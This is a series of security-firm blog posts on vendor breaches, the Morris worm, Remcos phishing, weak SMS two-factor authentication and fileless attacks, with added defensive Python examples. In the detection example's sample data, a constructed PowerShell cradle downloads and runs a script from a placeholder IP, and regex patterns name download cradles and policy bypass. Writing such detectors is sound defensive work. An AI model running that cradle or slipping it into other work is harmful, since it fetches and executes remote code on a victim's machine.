One or more attackers seized an opportunity to exploit the vendor’s access to the Pentagon’s network, ultimately stealing the travel records. Little else is known. This incident, though, is a prime example of how ambitious (or, rather, brazen) cyber-criminals are in their choice of targets. While some may focus on distributing ransomware to small businesses in exchange for payment, others are clearly setting their sights a little higher. The tools and technology available to such individuals empower them to exploit weaknesses in even those systems that should be the most airtight in the world. While the exact circumstances surrounding the vulnerability created by the vendor remain secret, the company responsible is no doubt determined to avoid such an oversight happening again. It’s also highly likely that the vendor has a strong reputation and valuable experience, to have secured the contract with the Department of Defense in the first place. This entire incident demonstrates why it’s so vital for businesses and organizations of all sizes, in all sectors, to perform thorough screening of any vendors they intend to work with.

Screening Vendors, Protecting Your Business
No business or organization should ever start working with a vendor without checking their credentials and their background. Simply settling on the first firm on your radar may not deliver the results you expect, and any mistakes or general incompetence on their part could have major repercussions.
You might not have data pertaining to thousands or even millions of civilians in your records, but you could still be risking your customers’ and employees’ privacy by choosing a sub-par team. If a data breach were to rock your company or organization, the damage could be extensive. First and foremost, those customers whose details have been compromised would be incredibly unlikely to keep working with you in the future. Fast, effective action can help to minimize the fallout and keep their finances safe from unauthorized access, but their perception of your brand would still be soured. Your reputation would be affected too, making it more difficult to build trust with new customers or affiliates. That’s not to mention the sheer disruption a breach could cause to your everyday operations, leaving you unable to deliver the services your customers expect for hours, days or longer. This equates to a potential loss of business and, sadly, income.

Undertaking effective, in-depth screening of your vendors is the smart choice. Look into any reviews you can find online to learn more about the quality of service previous clients have received. Did they perform as required? Did they use the right processes and achieve the goals they set out to, with respect for the client’s security needs? You may consider approaching some of these clients to get a deeper insight into their experience. Make sure to speak with prospective vendors at length, to get a better idea of how they work, what security measures they take to safeguard systems against breaches, and more. You can only ask so many questions and ask for so many examples of their prior work before making your decision, but doing your research will help ensure the safest choice for your business or organization. At The Driz Group, we’re committed to helping our clients stay protected and compliant, minimizing the risk of cyber-attacks using the latest automated third-party screening technologies.
Want to learn more about what we can do for you? Just get in touch!

Look Back into the First Major Cyberattack: The Morris Worm

Thirty years ago, the Morris worm, dubbed the first major cyberattack, was unleashed into the wild, crashing or slowing to a crawl 10%, or 6,000, of the 60,000 computers then connected to the “Internet”.

What Is the Morris Worm?
The Morris worm is named after its creator, Robert Tappan Morris. A worm, meanwhile, refers to a type of malicious software (malware) that has the ability to spread itself within networks without user interaction. Court documents showed that Morris, then a first-year graduate student in Cornell University's computer science Ph.D. program, released the worm on November 2, 1988 through a computer at the Massachusetts Institute of Technology (MIT), which Morris hacked into using a Cornell University computer. The Morris worm was released into the wild a year before the World Wide Web came into existence. The term “Internet” then referred to a U.S. computer network composed of connected computers from prestigious colleges, research centers, and governmental and military agencies. In less than 24 hours on November 2, 1988, the Morris worm infected the computers of institutions including Harvard, Princeton, Stanford, Johns Hopkins, the National Aeronautics and Space Administration (NASA) and the Lawrence Livermore National Laboratory. While the worm didn’t destroy or damage files, infected computers slowed to a crawl or ceased functioning, and emails were delayed for days. The estimated cost of dealing with the Morris worm at each installation ranged from $200 to over $53,000.
The worm infected computers running a specific version of the Unix operating system in four ways:

First, via a security vulnerability in “SEND MAIL”, a computer program that transfers and receives electronic mail;

Second, via a security vulnerability in the "finger demon", a computer program that allows extraction of limited information about the users of another computer;

Third, via the "trusted hosts" feature, which allows a user with certain privileges on one computer to have equivalent privileges on another computer without using a password; and

Fourth, via a program that guesses passwords using various combinations of letters tried out in rapid succession, hoping that one will be an authorized user's password. When the correct password is entered, the intruder is allowed whatever level of activity the user is authorized to perform.

Morris designed the worm to stay hidden. The worm was designed so that it wouldn’t copy itself onto a computer that already had a copy. It was also designed so that it would be killed when a computer was shut down.

Consequences of the Morris Worm
For unleashing the worm into the wild, Morris became the first person convicted of violating the U.S. Computer Fraud and Abuse Act, which outlaws unauthorized access to protected computers. He was sentenced to 3 years of probation, 400 hours of community service, a fine of $10,050 and the costs of his supervision. The first major cyberattack, perpetrated by the Morris worm, showed how vulnerable interconnected computers had become. Just days after the Morris worm attack, the U.S. Government created the country’s first computer emergency response team under the direction of the Department of Defense. Developers also began creating intrusion detection software. On the flip side, the Morris worm inspired a new breed of malicious hackers, plaguing the digital age.
In recent memory, the worm that most resembles the devastation caused by the Morris worm is the WannaCry worm, commonly known as WannaCry ransomware. In less than 24 hours on May 12, 2017, more than 300,000 computers in 150 countries were infected by WannaCry, each demanding a ransom payment. WannaCry is categorized as a worm, like the Morris worm, as it has the ability to spread itself within networks without user interaction. WannaCry specifically exploited a security vulnerability in the Server Message Block protocol (SMB protocol) in some versions of Microsoft Windows. The SMB protocol allows users to access files, printers and other resources on a network.

Prevention
Here are some cybersecurity measures to protect your organization’s computers or networks from worms similar to WannaCry and the Morris worm:

Implement Network Segmentation
In network segmentation, vital computers that house critical information and operations are separated or disconnected from computers connected to vulnerable systems like the public internet. Network segmentation ensures that when internet-facing computers are infected by a worm, these vital computers aren’t affected.

Keep All Software Up-to-Date
Make sure that software security updates are installed as promptly as possible, not months or years after their release dates. Cyberattackers have automated the process of scanning the internet for vulnerable computers – those that fail to install security updates. This was the case for WannaCry victims, who had failed to install the security update issued by Microsoft months before the WannaCry cyberattack.

Refrain from Using Legacy Hardware and Software
The term “legacy” refers to old and outdated computer hardware or software. Like computers that fail to install security updates in a timely manner, legacy hardware and software programs are targeted by cyberattackers because they no longer receive security updates from their vendors.
Some versions of Microsoft Windows (Windows XP, Windows 8, and Windows Server 2003) were targeted by WannaCry attackers as well, as at the time of the attack these software programs were no longer supported by Microsoft. A day after the WannaCry attack, however, Microsoft released security updates for Windows XP, Windows 8, and Windows Server 2003.

Protecting computers or networks from worms and other malicious software is important in order to prevent data breaches. Under Canada’s Digital Privacy Act, starting November 1 this year, private organizations are mandated to notify the Privacy Commissioner of Canada and the affected individuals “as soon as feasible” in the event that a data breach poses a “real risk of significant harm” to any individual. When you need help assessing and mitigating cybersecurity risks, contact our team of experts and minimize the likelihood of a data breach.

10/14/2018

Latest Phishing Campaign Attempts to Install Remcos Remote Access Tool into Victims' Computers

Thousands of Icelanders have been targeted in the latest phishing campaign, which attempts to install the Remcos remote access tool into the victims' computers, according to a recent report by Cyren. While the number of actual victims may seem low, Cyren said, this could be the largest cyberattack to hit Iceland, a country with a population of close to 350,000.

Latest Phishing Attack Modus Operandi
Magni Reynir Sigurðsson, senior threat analyst at Cyren, reported that the phishing campaign targeting Icelanders, observed since October 6th, begins with an email impersonating the Lögreglan, the Icelandic police. The email requests the recipient to come to the police station for questioning. The email also threatens the recipient that an arrest warrant may be issued in case of non-compliance. The attackers registered the domain name www[dot]logregian[dot]is.
This domain name, at first glance, is very similar to the official domain name of the Icelandic police, www[dot]logreglan[dot]is. The only difference is that the “l” in the official name is changed to an “i”. Buying this similarly named domain enables the attackers to send emails with a sender address ending in “logregian[dot]is”, which at first glance closely resembles emails from the official Icelandic police ending in “logreglan[dot]is”. The link provided in the phishing email, which purportedly leads to additional information about the case, leads to the phishing site www[dot]logregian[dot]is, which strikingly resembles the official site of the Icelandic police, www[dot]logreglan[dot]is.
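A defender facing this kind of lookalike sender domain would want a mail-gateway check that catches single-character confusables (l/i/1, o/0, rn/m) and near-miss spellings against a list of domains the organization must not see impersonated. The following is an added example in Python written for this article, not code from Cyren's report or from The Driz Group; the protected-domain list, the confusable table and the sample sender addresses are all constructed for illustration.

```python
"""Flag sender domains that impersonate a protected domain by confusable
characters or near-miss spelling (the logregian / logreglan trick above).
Added example; the confusable table, protected list and addresses are
constructed for illustration, not taken from any vendor's product."""
from __future__ import annotations

# Domains whose impersonation should be flagged (constructed list).
PROTECTED_DOMAINS = ["logreglan.is", "example-bank.is"]


def skeleton(domain: str) -> str:
    """Collapse visually confusable characters to one representative so that
    lookalikes compare equal: i/1/| -> l, 0 -> o, rn -> m, vv -> w."""
    s = domain.lower().replace("rn", "m").replace("vv", "w")
    return s.translate(str.maketrans({"i": "l", "1": "l", "|": "l", "0": "o"}))


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; catches one-character typosquats that the
    skeleton comparison misses (dropped, swapped or extra characters)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def sender_domain(address: str) -> str:
    """Domain part of an email address, lower-cased and trimmed."""
    return address.rsplit("@", 1)[-1].strip().lower()


def classify_sender(address: str, protected: list[str] = PROTECTED_DOMAINS) -> str:
    """Return 'legitimate', 'lookalike' or 'unrelated' for the sender's domain."""
    domain = sender_domain(address)
    goods = [g.lower() for g in protected]
    # Exact match, or a genuine subdomain of a protected domain.
    if any(domain == g or domain.endswith("." + g) for g in goods):
        return "legitimate"
    for g in goods:
        brand = g.split(".")[0]
        # Protected name embedded in a different domain, e.g. brand.is.portal.test
        if g in domain or brand in domain:
            return "lookalike"
        # Confusable substitution (l -> i) or a one-character edit.
        if skeleton(domain) == skeleton(g) or edit_distance(domain, g) <= 1:
            return "lookalike"
    return "unrelated"


def triage(addresses: list[str], protected: list[str] = PROTECTED_DOMAINS) -> dict[str, str]:
    """Classify a batch of sender addresses, e.g. pulled from a mail-gateway log."""
    return {a: classify_sender(a, protected) for a in addresses}


if __name__ == "__main__":
    # Constructed sample senders; logregian[dot]is is the lookalike from the article.
    SAMPLE_SENDERS = [
        "postur@logreglan.is",
        "postur@logregian.is",
        "alert@mail.logreglan.is",
        "info@logreglan.is.notice-portal.test",
        "newsletter@example.org",
    ]
    for addr, verdict in triage(SAMPLE_SENDERS).items():
        print(f"{verdict:10s} {addr}")
```

The skeleton comparison is what catches the l-to-i swap; the edit-distance check is a second net for typosquats that keep the same letters but drop or insert one, and the embedded-name check covers the protected name reused as a prefix or subdomain of an unrelated domain.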
On the phishing site, the victim is asked to provide an Icelandic social security number. Unlike other phishing sites, which can be fooled by entering wrong data, this phishing site knows whether or not the victim is entering the wrong social security number. When a wrong number is entered, an error alert is shown; when the number entered is correct, the victim is taken to a new phishing webpage that displays the victim's actual name. Sigurðsson hypothesized that the phishers used a database, containing Icelanders’ social security numbers and actual names, that was leaked years ago. Being able to match the social security number with the actual name gives further credence to this phishing campaign. To add yet more credence, the attackers ask the victim to enter the authentication number contained in the email that was sent to them. Entering the authentication number leads the victim to another phishing webpage that automatically downloads a .rar file purportedly containing additional documents about the case. When this .rar file is extracted, a .scr file (a Windows screensaver) disguised as a Word document, with the file name “Boðun í skýrslutöku LRH 30 Óktóber.scr”, roughly translated into English as “Called in for questioning by the police on October 30th”, is shown. When this disguised Word document is executed, two files, “Yfirvold.exe” and “Yfirvold.vbs”, are dropped onto the victim's computer. Sigurðsson said that the Yfirvold.vbs file is placed in the Windows Startup folder so that if the victim reboots the computer, the .vbs script will execute Yfirvold.exe – malware that uses code and components from a known remote access tool called “REMCOS”.

What Is REMCOS?
REMCOS stands for Remote Control & Surveillance Software. This software is sold online by a company called “Breaking Security”. Remcos’ price ranges from €58 to €389. Buyers of Remcos can also pay using a variety of cryptocurrencies.
Breaking Security markets Remcos as legitimate software that allows users to remotely control and monitor the Windows operating system, from Windows XP and all versions thereafter, including server editions. In addition to selling Remcos, Breaking Security also offers Octopus Protector, a keylogger and a mass mailer. Octopus Protector encrypts a malware-laden file on the disk, allowing it to bypass several antivirus protections. A keylogger records and sends the keystrokes made on a computer, while a mass mailer sends large volumes of emails. In the case of the phishing attack targeting thousands of Icelanders, according to Sigurðsson, the Remcos that’s installed on the victims’ computers comes with keylogging capability, collecting input from the victims’ keyboards, storing it in logs and then uploading the logs to command and control servers run by the attackers. These servers, Sigurðsson said, are located in Germany and Holland. The Remcos installed on the victims’ computers in the Iceland phishing attack also comes with a checker that tests whether the victims are accessing the largest online banks in Iceland. According to security researcher MalwareHunterTeam, this checking capability is a selective keylogger feature of Remcos. According to researchers at Cisco Talos, Remcos was also used to attack international news agencies, diesel equipment manufacturers operating within the maritime and energy sector, and HVAC service providers operating within the energy sector. "Since Remcos is advertised and sold on numerous hacking-related forums, we believe it is likely that multiple unrelated actors are leveraging this malware in their attacks using a variety of different methods to infect systems,” researchers at Cisco Talos said.
Similar to the phishing attack targeting Icelanders, the cyberattacks mentioned by Cisco Talos started with a phishing email purportedly coming from a government agency and carrying an attached document. Embedded in the attached document is a small executable. “The extracted executable is simple and functions as the downloader for the Remcos malware,” Cisco Talos researchers said. “It is a very basic program and is used to retrieve Remcos from an attacker-controlled server and execute it, thus infecting the system.”

Prevention
While the company behind Remcos claims that its software is meant for legitimate use, data in the wild, including the cyber incidents reported by Cyren and Cisco Talos, demonstrates that Remcos is being used by malicious actors. Remcos is a powerful remote access tool that’s regularly modified to include new functionalities to remotely control and monitor any Windows operating system. Make sure that your organization is implementing security measures to combat Remcos and other phishing modus operandi. When you need help, we are a phone call away. Connect with us today and protect your business.

Reddit Data Breach Highlights Weaknesses of SMS-Based 2-Factor Authentication

Reddit recently announced that it succumbed to a cyberattack, an attack born out of the weaknesses inherent in SMS-based 2-factor authentication (2FA). Reddit, in a statement, said that an attacker managed to access the company’s complete copy of a database backup containing user data from the site’s launch in 2005 up to May 2007. The data accessed for this period include users’ passwords and public and private messages. The company added that the email addresses of current users, source code, internal logs, configuration files and other employee workspace files were also accessed by the attacker.
While acknowledging that the recent cyberattack was serious, Reddit said the attacker didn’t do much damage to the site itself, as the attacker only gained read-only access, not write access, to Reddit systems. Reddit said that the attacker entered the company’s systems as a result of the weaknesses inherent in SMS-based 2FA. “Already having our primary access points for code and infrastructure behind strong authentication requiring two factor authentication (2FA), we learned that SMS-based authentication is not nearly as secure as we would hope, and the main attack was via SMS intercept,” Reddit said.

What Is Two-Factor Authentication (2FA)?
Two-Factor Authentication, also known as 2FA, is an added layer of protection meant to ensure that the security of online accounts goes further than a username and a password. Here are the 3 most common types of 2FA or security keys for securing your online accounts:

1. SMS-Based 2FA
In SMS-based 2FA, whenever you log in to your online account, after entering your username and password, a verification code is sent in the form of an SMS message to your mobile phone. Once the correct verification code is entered after the correct username and password, you gain access to your online account. In the case of the Reddit cyberattack, it wasn’t disclosed how the attacker carried out the "SMS intercept". The publicly known scenario for SMS intercept is SIM swapping, also known as SIM hijacking. In SIM swapping, an attacker calls a cell phone carrier’s tech support pretending to be the target victim and claims that the target’s SIM card is lost. The attacker then requests that the phone number of the target be transferred (also known as ported) to a new SIM card that the attacker already owns.
The attacker in this scam convinces the phone carrier’s tech support to transfer the phone number to a new SIM card by providing the target’s personally identifiable information, including Social Security Number or home address, details that are available online after many past data breaches at other companies. Once an attacker convinces the phone carrier’s tech support to perform the SIM swap, it’s game over for the target. The immediate effect is that the target loses phone service, and any 2FA verification code delivered via SMS is sent to the new SIM card that the attacker controls.

2. App-Based 2FA
In app-based 2FA, you need to download an app, such as Google Authenticator or Authy, to your mobile phone or PC. Once the app is installed and configured, you get the verification code from your device after entering your correct username and password. Unlike SMS-based 2FA, you can still get the verification code when your phone service is shut off. The downside of app-based 2FA is that the verification code needs to be entered into the same login page on a website along with the username and password. This allows cyberattackers to subvert the username, password and verification code through attacks such as phishing and man-in-the-middle. In a phishing attack, a user is duped into revealing sensitive data, including username and password. In a man-in-the-middle attack, the attacker positions himself in a conversation between a user and an application, making it appear as if a normal exchange of information is taking place.

3. Hardware-Based 2FA
Hardware-based 2FA, also known as a physical security key, comes in the form of a USB device. The login process is completed by inserting the USB device into a USB port and pressing a button on the device, eliminating the need to retype verification codes. This also serves to verify that you’re not a remote malicious hacker.
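To make the difference between the second and third kinds of 2FA above concrete, here is an added example in Python, not code from Reddit, Google or Yubico. It generates and verifies the time-based codes authenticator apps produce (TOTP, RFC 6238), then models why a code typed into a relayed phishing page still works for the attacker while a response bound to the site origin the browser is actually on does not. The shared secret (the RFC 6238 test-vector secret), the key secret and both origins are constructed; the origin-bound response uses an HMAC as a stand-in for a security key's public-key signature, which is a deliberate simplification.

```python
"""TOTP codes as used by authenticator apps, and a model of why a typed code
can be relayed by a phishing page while an origin-bound response cannot.
Added example; secrets and origins are constructed. The HMAC 'signature'
below is a simplification of a hardware key's public-key signature."""
import hashlib
import hmac
import struct


def totp(secret: bytes, at: int, step: int = 30, digits: int = 6) -> str:
    """TOTP per RFC 6238 with HMAC-SHA1: HOTP over the time counter at // step."""
    counter = struct.pack(">Q", at // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                       # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def verify_totp(secret: bytes, code: str, at: int, step: int = 30, window: int = 1) -> bool:
    """Accept the current step and +/- `window` neighbours to tolerate clock drift."""
    return any(hmac.compare_digest(totp(secret, at + d * step, step), code)
               for d in range(-window, window + 1))


def key_response(key: bytes, challenge: bytes, origin: str) -> bytes:
    """Model of a security key answering a login challenge: the response covers
    the origin the browser reports, so it is only valid for that origin."""
    return hmac.new(key, challenge + b"|" + origin.encode(), hashlib.sha256).digest()


def service_verify(key: bytes, challenge: bytes, expected_origin: str, response: bytes) -> bool:
    """The real service checks the response against its own origin, not the one
    the victim's browser happened to be on."""
    return hmac.compare_digest(key_response(key, challenge, expected_origin), response)


REAL_ORIGIN = "https://login.example.net"          # constructed
PHISH_ORIGIN = "https://login.example-net.test"    # constructed lookalike


def phish_relay_outcomes(now: int) -> dict:
    """Simulate a relay phishing page that forwards what the victim submits to
    the real service. Returns whether each second factor lets the relay in."""
    totp_secret = b"12345678901234567890"   # RFC 6238 test-vector secret, constructed here
    key_secret = b"constructed-key-secret"
    # App-based 2FA: the victim types the current code into the phishing page;
    # the relay forwards it within the same 30-second step. The code carries no
    # information about where it was typed, so the real service accepts it.
    typed_code = totp(totp_secret, now)
    totp_accepted = verify_totp(totp_secret, typed_code, now)
    # Hardware key: the browser tells the key it is on PHISH_ORIGIN, the key
    # answers for that origin, and the real service (expecting REAL_ORIGIN)
    # rejects the relayed response. A genuine login on the real origin passes.
    challenge = b"\x42" * 32   # constructed challenge issued by the real service
    relayed = key_response(key_secret, challenge, PHISH_ORIGIN)
    key_accepted = service_verify(key_secret, challenge, REAL_ORIGIN, relayed)
    genuine = key_response(key_secret, challenge, REAL_ORIGIN)
    genuine_accepted = service_verify(key_secret, challenge, REAL_ORIGIN, genuine)
    return {"totp_relayed": totp_accepted, "key_relayed": key_accepted,
            "key_genuine": genuine_accepted}


if __name__ == "__main__":
    import time
    print("current code:", totp(b"12345678901234567890", int(time.time())))
    print(phish_relay_outcomes(int(time.time())))
```

The point the model makes is structural: a TOTP code proves possession of the secret but says nothing about which site it was entered into, whereas the origin-bound response can only be checked successfully by the service whose origin the browser reported, which is the "two-way verification" the Google quotation later in this post describes.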
Unlike SMS-based 2FA and app-based 2FA, with hardware-based 2FA you don’t need your mobile phone to access your online accounts. Yubico, the most popular maker of hardware-based security keys, sells its basic model for only $20. Last month, Google announced that its own hardware-based security keys, called “Titan Security Keys”, are available to Google Cloud customers and will soon be available for anyone to purchase on the Google Store. Last month also, Google told cybersecurity journalist Brian Krebs that since early 2017, more than 85,000 of its employees have been using physical security keys. Since then, the tech giant said, none of those 85,000+ employees have fallen prey to phishing attacks on their work-related accounts. Google said that Titan Security Keys enhance protection against phishing as “2-step verification with a security key uses cryptography to provide two-way verification: it makes sure you're logging into the service you originally registered the security key with, and the service verifies that it's the correct security key as well”. The downside of physical security keys is that carrying these devices around is a security risk, as once attackers get hold of them, it’s also game over for the targets. Physical security keys, therefore, have to be kept in a safe and secure place. When you have questions about your options for better protecting mission-critical data, our experts are a phone call away. Call today: 1.888.900.DRIZ (3749)

Fileless Cyberattacks: They're Getting More Widespread and They're Working

Reports from Ponemon Institute and McAfee Labs have shown that fileless cyberattacks are getting more widespread and they're working.

What Are Fileless Cyberattacks?
Fileless cyberattacks, also known as zero-footprint attacks, refer to cyberattacks that are meant to evade detection by avoiding, at one stage or another, installing malicious software (malware) on the victims’ computers.
McAfee Labs reported that there’s a significant shift by some cyberattackers toward exploiting trusted Microsoft proprietary programs, rather than installing external malware, to attack computers or office computer networks. In the Ponemon Institute’s study “The 2017 State of Endpoint Security Risk”, researchers found that 77% of successful cyberattacks in 2017 used fileless techniques. The study found that fileless attacks are almost 10 times more likely to succeed than file-based attacks.

The terms “fileless” and “zero-footprint” are misnomers. Fileless cyberattacks aren’t exclusively fileless at every stage. For instance, the attack may start with the opening of a malicious file attached to a spam email, and once the infection starts, the attackers may shift to fileless techniques. Attackers can also compromise victims' computers filelessly at the beginning of the attack, for instance by exploiting an unpatched security vulnerability, and then, once access is achieved, install external malware. Nor are fileless cyberattacks necessarily “zero-footprint”, because they do leave traces on the victims’ computers if one knows where to look. There is, however, justification for the name “fileless cyberattacks”, as these attacks don’t exhibit the usual symptoms normally associated with a malware infection on the computer disk. As they’re asymptomatic, they’re hard to detect, and as such traditional anti-virus solutions can’t detect them. Instead of installing the malware on the computer disk, a fileless attack embeds the malware in scripts or loads it into the computer's memory, where it never gets copied to the disk, thereby bypassing endpoint security measures such as anti-virus, which typically rely on file input/output to detect threats.

Examples of Fileless Cyberattacks
Below are examples of how attackers infect victims’ computers filelessly:

1. Fileless Cyberattacks via Microsoft’s Windows PowerShell
One of the ways attackers infect victims’ computers filelessly is via Microsoft’s Windows PowerShell. Windows PowerShell is Microsoft’s task automation and configuration management framework. Available on Windows 7 onward, PowerShell allows full access to Microsoft COM (Component Object Model) and Microsoft Windows Management Instrumentation (WMI). Attackers can access Windows features using PowerShell. One preventive measure for protecting PowerShell against fileless cyberattacks is setting its execution policy to "Restricted". According to McAfee Labs, attackers can easily get around this restriction by performing “remote execution of a script by directly executing it in memory to bypass endpoint security.” System administrators bypass the Windows PowerShell restriction in the same manner to execute commands on office computer networks from a remote location via the internet.

2. Fileless Cyberattacks via Microsoft’s Remote Desktop Protocol (RDP)
Another way attackers infect victims’ computers filelessly is via Microsoft’s Remote Desktop Protocol. Remote Desktop Protocol, just like Windows PowerShell, is proprietary software developed by Microsoft. And just like PowerShell, which is primarily used by system administrators, Remote Desktop Protocol is used by system administrators to access other computers or office computer networks from a remote location via the internet. Attackers gain access to victims' computers via Remote Desktop Protocol by simply guessing their way past weak passwords or by using popular password cracking tools. McAfee Labs reported that thousands of these Remote Desktop Protocol login details (specifically for Windows XP through Windows 10, and Windows Server 2008 and 2012) are sold online for between $3 and $19.
Once attackers gain access to your organization’s computer network via Remote Desktop Protocol, they can do anything with it, such as install any malware of their choice. In both kinds of fileless cyberattack, via Windows PowerShell and via Remote Desktop Protocol, once attackers gain access to victims’ computers they’re viewed as system administrators, masking the identity of the attackers and allowing them to hide in plain sight.

3. PowerGhost
PowerGhost is cryptocurrency mining malware – malicious software that hijacks the processing power of victims’ computers. Kaspersky Lab first identified this malware. It spreads across large corporate networks, infecting both workstations and servers, by using a number of fileless techniques, including Mimikatz, a hacking tool designed to siphon a Windows user's password out of the computer's memory. PowerGhost propagates itself across the local network by launching a copy of itself via Windows PowerShell and via the now-notorious EternalBlue exploit – a spy tool believed to have been developed by the US National Security Agency (NSA) and leaked by the hacking group Shadow Brokers in April 2017. On March 14, 2017, a month before Shadow Brokers leaked the EternalBlue code, Microsoft released a security update, or patch, fixing the security vulnerability exploited by EternalBlue.

Prevention against Fileless Cyberattacks
As shown in the above-mentioned examples, attackers use a number of techniques for fileless attacks. Here are some of the preventive measures against fileless attacks:
By keeping your software up-to-date, your organization’s computer network won’t be vulnerable to the EternalBlue exploit.
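Prevention is only half of the picture for fileless techniques, since the legitimate tools themselves cannot be removed; the other half is detecting their abuse. Here is an added example in Python, not McAfee or Kaspersky code, that runs two checks over constructed Windows-style event records. The first decodes and inspects PowerShell command lines for the in-memory execution, execution-policy bypass and download-and-run patterns described under example 1; the second counts failed remote-interactive (RDP, logon type 10) logons per source address to spot the password guessing described under example 2, and notes whether a success followed. The event records, hostnames, addresses and regular expressions are constructed for illustration; in practice the inputs would come from Security log event IDs 4688, 4625 and 4624 or from PowerShell script-block logging.

```python
"""Detection checks for the two fileless techniques above: suspicious
PowerShell command lines and RDP password guessing. Added example with
constructed events; patterns are illustrative, not a vendor's rule set."""
import base64
import re
from collections import defaultdict

# Indicator patterns applied to PowerShell command lines and decoded payloads.
PS_INDICATORS = [
    (r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}", "encoded command"),
    (r"-(?:ep|executionpolicy)\s+bypass", "execution policy bypass"),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", "download cradle"),
    (r"\biex\b|invoke-expression", "in-memory execution"),
]


def encode_command(text: str) -> str:
    """Base64 of UTF-16LE text, the encoding -EncodedCommand expects (used to
    build the constructed sample below)."""
    return base64.b64encode(text.encode("utf-16le")).decode()


def decode_encoded_command(cmd: str) -> str:
    """Decode a -EncodedCommand argument so the hidden payload can be inspected
    alongside the visible arguments; returns '' when there is none."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", cmd, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze_powershell(cmd: str) -> list:
    """Indicator names matched by a command line and its decoded payload."""
    text = cmd + "\n" + decode_encoded_command(cmd)
    return [name for pattern, name in PS_INDICATORS if re.search(pattern, text, re.I)]


def rdp_guessing(events: list, threshold: int = 5) -> dict:
    """Sources with >= threshold failed RDP (logon type 10) logons, mapped to
    (failure count, whether a later success from that source was seen)."""
    failures = defaultdict(int)
    succeeded = set()
    for ev in events:
        if ev.get("logon_type") != 10:
            continue
        if ev["id"] == 4625:
            failures[ev["src"]] += 1
        elif ev["id"] == 4624 and failures[ev["src"]] >= threshold:
            succeeded.add(ev["src"])
    return {src: (n, src in succeeded) for src, n in failures.items() if n >= threshold}


def run_detections(events: list) -> dict:
    """Apply both checks to a mixed event stream."""
    ps_alerts = []
    for ev in events:
        if ev["id"] == 4688 and "powershell" in ev["cmd"].lower():
            hits = analyze_powershell(ev["cmd"])
            if hits:
                ps_alerts.append((ev["host"], hits))
    return {"powershell": ps_alerts, "rdp_guessing": rdp_guessing(events)}


def sample_events() -> list:
    """Constructed events; addresses come from documentation ranges."""
    payload = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/s.ps1')"
    events = [
        {"id": 4688, "host": "WS01", "cmd": "powershell.exe -NoProfile -ExecutionPolicy Bypass "
                                            "-WindowStyle Hidden -EncodedCommand " + encode_command(payload)},
        {"id": 4688, "host": "WS02", "cmd": r"powershell.exe -File C:\scripts\inventory.ps1"},
    ]
    fail = {"id": 4625, "host": "SRV01", "src": "198.51.100.7", "logon_type": 10, "user": "administrator"}
    events += [fail] * 6
    events.append({"id": 4624, "host": "SRV01", "src": "198.51.100.7", "logon_type": 10, "user": "administrator"})
    events += [{"id": 4625, "host": "SRV01", "src": "192.0.2.9", "logon_type": 10, "user": "jsmith"}] * 2
    events.append({"id": 4624, "host": "SRV01", "src": "192.0.2.9", "logon_type": 10, "user": "jsmith"})
    return events


if __name__ == "__main__":
    result = run_detections(sample_events())
    for host, hits in result["powershell"]:
        print(host, "->", ", ".join(hits))
    print(result["rdp_guessing"])
```

The encoded-command decoding matters because the arguments that reveal a download-and-execute cradle are often only visible after decoding; the RDP check pairs a failure count with the success that follows it, which is the event a responder actually needs to act on.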
When you are looking to boost staff awareness and better protect your applications and infrastructure, get in touch and we will be happy to help.
Author: Steve E. Driz, I.S.P., ITCP
1/10/2019